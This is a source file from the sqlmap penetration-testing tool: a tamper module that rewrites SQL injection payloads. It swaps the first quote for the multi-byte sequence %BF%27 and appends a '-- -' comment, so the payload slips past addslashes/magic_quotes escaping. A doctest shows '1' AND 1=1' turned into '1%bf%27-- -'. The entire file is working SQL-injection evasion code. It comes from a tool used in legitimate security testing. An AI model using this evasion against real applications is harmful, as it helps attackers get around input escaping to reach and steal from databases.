1#!/usr/bin/env python 2 3""" 4Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) 5See the file 'LICENSE' for copying permission 6""" 7 8import re 9 10from lib.core.compat import xrange 11from lib.core.enums import PRIORITY 12 13__priority__ = PRIORITY.NORMAL 14 15def dependencies(): 16 pass 17 18def tamper(payload, **kwargs): 19 """ 20 Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work) 21 22 Notes: 23 * Useful for bypassing magic_quotes/addslashes feature 24 25 Reference: 26 * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string 27 28 >>> tamper("1' AND 1=1") 29 '1%bf%27-- -' 30 """ 31 32 retVal = payload 33 34 if payload: 35 found = False 36 retVal = "" 37 38 for i in xrange(len(payload)): 39 if payload[i] == '\'' and not found: 40 retVal += "%bf%27" 41 found = True 42 else: 43 retVal += payload[i] 44 continue 45 46 if found: 47 _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) 48 if _ != retVal: 49 retVal = _ 50 retVal += "-- -" 51 elif not any(_ in retVal for _ in ('#', '--', '/*')): 52 retVal += "-- -" 53 return retVal 54